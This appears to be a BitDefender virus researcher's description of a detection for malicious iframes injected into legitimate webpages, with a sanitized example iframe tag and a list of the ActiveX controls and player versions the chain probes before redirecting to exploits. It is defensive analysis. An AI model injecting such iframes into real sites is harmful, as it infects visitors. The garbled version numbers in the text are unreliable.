It currently leads to a Rootkit.Agent.AIWN infection.
Please let BitDefender disinfect your files.
Alexandru Maximciuc, virus researcher
Detects a type of malicious iframes injected in legit webpages.
The iframe tag looks like: <iframe src=http://sanitized/fxx.htm width=100 height=0>
I'll base this description on a valid site(many of them were sanitized or taken down): hxxp://www.*******.cn/a114/fxx.htm
(please don't access that page in your browser unless you know what you're doing.)
page which only contains a SCRIPT tag and here the fun begins(with many iframes injected in page):
- this one tries to exploit a vulnerability in FlashPlayer
- if Sina Downloader.DLoader.1 Activex Control
- if UUUPGRADE.UUUpgradeCtrl.1 ActiveX Control
- if MPS.StormPlayer ActiveX Control
- for GLIEDown.IEDown.1
- for RealPlayer IERPCtl.IERPCtl.1
's version is older than 188.8.131.522 (or it)
- if RealPlayer
's version is newer than 184.108.40.2062 fx.htm
is detected as Trojan.Exploit.ANPI
and, depending on browser, leads to a Trojan.Exploit.SSX
for browser which have "msie
" in their User-Agent, respectively Trojan.JS.Redirector.E
for the rest of browsers. This leads eventually to some flash files detected as Exploit.SWF.Gen